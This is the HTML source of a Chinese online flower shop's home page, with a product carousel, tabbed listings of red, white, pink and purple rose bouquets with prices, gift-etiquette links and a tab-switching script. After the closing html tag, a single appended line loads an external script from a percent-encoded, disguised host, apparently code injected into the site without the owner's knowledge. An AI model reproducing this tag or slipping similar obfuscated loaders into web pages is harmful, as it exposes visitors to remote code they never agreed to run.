<!DOCTYPE html>
<html>

	<head>
		<meta charset="UTF-8">
		<title></title>
		<style>
			nav {
				width: 990px;
				height: 30px;
				background: orangered;
				margin: auto;
				position: relative; z-index: 4;
			}
			
			nav ul {
				list-style: none;
				padding: 0px;
				margin: 0px;
			}
			
			nav ul li {
				float: left;
				width: 120px;
				text-align: center;
				height: 30px;
				line-height: 30px;
			}
			
			nav .orangetext {
				background: orangered;
				width: 180px;
				text-align: left;
				color: white;
			}
			
			nav.orangetext2 {
				color: white;
				width: 150px;
			}
			
			nav ul li ul {
				display: none;
			}
			
			nav ul li:hover ul {
				display: block;
			}
			
			nav ul li li {
				background: orangered;
				color: #FFFFFF;
			}
			
			#top {
				width: 990px;
				position: relative;
				margin: auto;
			}
			
			#top img {
				vertical-align: middle;
			}
			
			#serch {
				position: absolute;
				left: 260px;
				top: 40px;
			}
			
			#phone {
				position: absolute;
				top: 40px;
				left: 660px;
				height: 32px;
				line-height: 32px;
			}
			
			#telephone {
				position: absolute;
				right: 25px;
				top: 40px;
			}
			
			.example {
				width: 970px;
				height: 342px;
				font-size: 40px;
				text-align: center;
				margin: 20px auto;
			}
			
			.carousel-item {
				line-height: 336px;
				color: #fff;
				font-family: Arial Black
			}
			
			.wrapper {
				margin: auto;
				height: 550px;
				width: 990px;
				position: relative;
			}
			
			.content {
				position: relative;
				display: none;
				margin: auto;
				width: 990px;
				height: 550px;
				margin-top: 8px;
			}
			
			.content ul {
				list-style: none;
				padding: 0px;
				margin: 0px;
				width: 990px;
			}
			
			.content ul li {
				width: 247.5px;
				height: 300px;
				float: left;
				text-align: center;
			}
			/*点击该按钮的时候显示该颜色*/
			
			.active {
				background-color: orangered;
			}
			
			button {
				background-color: #aaa;
				margin-top: 5px;
				list-style-type: none;
				width: 125px;
				height: 40px;
				font-family: "新宋体";
				font-size: 18px;
				border: none;
			}
			
			button:first-child {
				margin-left: 10px;
			}
			
			.huitiao {
				width: 990px;
				margin: auto;
			}
			
			.huitiao ul {
				width: 990px;
			}
			
			.huitiao ul li {
				float: left;
				width: 990px;
				line-height: 30px;
				text-align: left;
				background: #AAAAAA;
				color: white;
			}
			
			.wenti {
				width: 990px;
				margin: auto;
			}
			
			.wenti ul {
				width: 990px;
				list-style: circle;
			}
			
			.wenti ul li {
				width: 320px;
				height: 30px;
				float: right;
				text-align: left;
			}
			.menu{
				position: relative;
				width: 990px;
				margin: auto;
			}
			.menu ul{
				width: 990px;
				list-style: none;
			}
			.menu ul li{
				width: 140px;
				height: 35px;
				float: left;
				line-height: 30px;
				text-align: center;
				color: white;
				border-right: 1px solid #CCCCCC;
				background: orangered;
			}
			.footer{
			
				width: 990px;
				margin:auto;
			}
			.footer ul{
				width: 990px;
			}
			.footer ul li{
				width: 990px;
				list-style: none;
				line-height: 30px;
				text-align:center;
				float: left;
			}
		</style>
		<link rel="stylesheet" href="css/ft-carousel.css" />
		<script src="js/jquery.min.js"></script>
		<script src="js/ft-carousel.min.js"></script>
	</head>

	<body>

		<div id="top">
			<div id="logo">
				<img src="img/logo.jpg" width="200px" />
			</div>
			<div id="serch">
				<img src="img/serch.png" />
			</div>
			<div id="phone">
				<img src="img/phone.png" />4008-823-283
			</div>
			<div id="telephone">
				<img src="img/headset.png" />在线客服
			</div>
		</div>
		<nav>
			<ul>
				<li class="orangetext">全部商品导购</li>
				<li>
					<a href="default.html" target="_self">首页</a>
				</li>
				<li class="orangetext2"><a href="xuanxiangka.html">鲜花</a></li>
				<li><a href="yongshenghua.html">永生花</a>
					<ul>
						<li>经典花盒</li>
						<li>巨型玫瑰</li>
						<li>永生瓶花</li>
						<li>特色永生花</li>
					</ul>
				</li>
				<li class="orangetext2"><a href="lipin.html">礼品</a>
					<ul>
						<li>音乐盒</li>
						<li>金箔花</li>
						<li>首饰</li>
						<li>巧克力</li>
					</ul>
				</li>
				<li class="orangetext2">
					<a href="index.html" target="_self">花语大全</a>
				</li>
				<li class="orangetext2"><a href="lxwm.html">联系我们</a></li>
			</ul>
		</nav>
		<div class="example">
			<div class="ft-carousel" id="carousel_1">
				<ul class="carousel-inner">
					<li class="carousel-item"><img src="img/xianhua01.jpg" /></li>
					<li class="carousel-item"><img src="img/xianhua02.jpg" /></li>
					<li class="carousel-item"><img src="img/xianhua03.jpg" /></li>

				</ul>
			</div>
		</div>

		<script type="text/javascript">
			$("#carousel_1").FtCarousel();

			$("#carousel_2").FtCarousel({
				index: 1,
				auto: false
			});

			$("#carousel_3").FtCarousel({
				index: 0,
				auto: true,
				time: 3000,
				indicators: false,
				buttons: true
			});
		</script>
		<!--布局样式-->
		<div class="wrapper">
			<!--选项卡-->
			<button class="active">红色玫瑰</button>
			<button>白色玫瑰</button>
			<button>粉色玫瑰</button>
			<button>紫色玫瑰</button>
			<div class="content" style="display: block;">
				<ul>
					<li><img src="img/hongse1.jpg" width="220px" /><br/>￥329<br />红色妖姬</li>
					<li><img src="img/hongse2.jpg" width="220px" /><br/>￥456<br />用心爱你</li>
					<li><img src="img/hongse3.jpg" width="220px" /><br/>￥329<br />LOVE</li>
					<li><img src="img/hongse4.jpg" width="220px" /><br/>￥368<br />母爱</li>
					<li><img src="img/hongse5.jpg" width="220px" /><br/>￥168<br />致美丽的你</li>
					<li><img src="img/hongse6.jpg" width="220px" /><br/>￥289<br />缪斯女神</li>
					<li><img src="img/hongse7.jpg" width="220px" /><br/>￥318<br />健康长久</li>
					<li><img src="img/hongse8.jpg" width="220px" /><br/>￥188<br />浪漫心情</li>
					<li><img src="img/hongse9.jpg" width="220px" /><br/>￥168<br />致美丽的你</li>
					<li><img src="img/hongse10.jpg" width="220px" /><br/>￥289<br />缪斯女神</li>
					<li><img src="img/hongse11.jpg" width="220px" /><br/>￥318<br />浪漫心情</li>
					<li><img src="img/hongse12.jpg" width="220px" /><br/>￥188<br />健康长久</li>
				</ul>
			</div>
			<div class="content">
				<ul>
					<li><img src="img/baise1.jpg" width="220px" /><br />￥218<br />月光女神</li>
					<li><img src="img/baise2.jpg" width="220px" /><br />￥226<br />如初</li>
					<li><img src="img/baise3.jpg" width="220px" /><br />￥315<br />纯美恋人</li>
					<li><img src="img/baise4.jpg" width="220px" /><br />￥316<br />海洋之心</li>
					<li><img src="img/baise5.jpg" width="220px" /><br />￥426<br />初心永不变</li>
					<li><img src="img/baise6.jpg" width="220px" /><br />￥319<br />清晨的问候</li>
					<li><img src="img/baise7.jpg" width="220px" /><br />￥116<br />爱是唯一</li>
					<li><img src="img/baise8.jpg" width="220px" /><br />￥128<br />爱的诺言</li>
				</ul>
			</div>
			<div class="content">
				<ul>
					<li><img src="img/fense1.jpg" width="220px" /><br />￥351<br />甜美公主</li>
					<li><img src="img/fense2.jpg" width="220px" /><br />￥288<br />浪漫缤纷</li>
					<li><img src="img/fense3.jpg" width="220px" /><br />￥256<br />假日公主</li>
					<li><img src="img/fense4.jpg" width="220px" /><br />￥219<br />你的香气</li>
					<li><img src="img/fense5.jpg" width="220px" /><br />￥288<br />好心情</li>
					<li><img src="img/fense6.jpg" width="220px" /><br />￥318<br />幸福时光</li>
					<li><img src="img/fense7.jpg" width="220px" /><br />￥468<br />美丽心情</li>
					<li><img src="img/fense8.jpg" width="220px" /><br />￥258<br />柔情蜜意</li>
				</ul>
			</div>
			<div class="content">
				<ul>
					<li><img src="img/zise1.jpg" width="220px" /><br />￥288<br />勿忘我</li>
					<li><img src="img/zise2.jpg" width="220px" /><br />￥298<br />紫为你动馨</li>
					<li><img src="img/zise3.jpg" width="220px" /><br />￥356<br />紫霞仙子</li>
					<li><img src="img/zise4.jpg" width="220px" /><br />￥298<br />梦里开花</li>
					<li><img src="img/zise5.jpg" width="220px" /><br />￥398<br />等你来</li>
					<li><img src="img/zise6.jpg" width="220px" /><br />￥186<br />虞美人</li>
					<li><img src="img/zise7.jpg" width="220px" /><br />￥199<br />梦醒之处</li>
				</ul>
			</div>
		</div>
	
			<div class="huitiao">
				<ul>
					<li>鲜花常识&送花礼仪</li>
				</ul>
			</div>
			<div class="wenti">
				<ul>
					<li>&nbsp;&nbsp;&nbsp;为什么要选择鲜花速递？</li>
						<li>&nbsp;&nbsp;&nbsp;选择鲜花速递需要注意什么？</li>
						<li>&nbsp;&nbsp;&nbsp;送花支数代表的含义</li>
						<li>&nbsp;&nbsp;&nbsp;各种花代表的不同含义</li>
						<li>&nbsp;&nbsp;&nbsp;玫瑰概述及花语</li>
						<li>&nbsp;&nbsp;&nbsp;送花的常识和技巧</li>
						<li>&nbsp;&nbsp;&nbsp;经典送花祝福语</li>
						<li>&nbsp;&nbsp;&nbsp;用鲜花表达情感-谈送花礼仪</li>
						<li>&nbsp;&nbsp;&nbsp;不同场合送什么花？</li>
						<li>&nbsp;&nbsp;&nbsp;鲜花与星座</li>
						<li>&nbsp;&nbsp;&nbsp;如何让鲜花保鲜</li>
						<li>&nbsp;&nbsp;&nbsp;鲜花与节日</li>
						<li>&nbsp;&nbsp;&nbsp;鲜花与生日</li>
						<li>&nbsp;&nbsp;&nbsp;婚礼用鲜花大全</li>
						<li>&nbsp;&nbsp;&nbsp;女孩都喜欢别人送鲜花吗？</li>
				</ul>
			</div>
			<div class="menu">
				<ul>
					<li>十年品牌</li>
						<li>3小时配送</li>
						<li>低价保障</li>
						<li>配送范围</li>
						<li>花店加盟</li>
						<li>投诉建议</li>
						<li>首页</li>
				</ul>
			</div>
	<div class="footer">
				<ul>
					<li>全国统一订花电话:400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</li>
				</ul>
		</div>
		<!--JS代码-->
		<script type="text/javascript">
			// 将按钮和盒子拿出来
			var btn = document.getElementsByTagName('button');
			var div = document.getElementsByClassName('content');
			// 每一个button上面绑定事件
			for(var n = 0; n < btn.length; n++) {
				//生成闭包的立即函数
				(function(i) {
					btn[n].onclick = function() {
						for(var m = 0; m < btn.length; m++) {
							btn[m].className = ""; //清空效果
							div[m].style.display = "none";
						}
						//当前点击的button设置变化
						this.className = "active";
						div[i].style.display = "block";
					}
				}(n))
			}
		</script>
	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>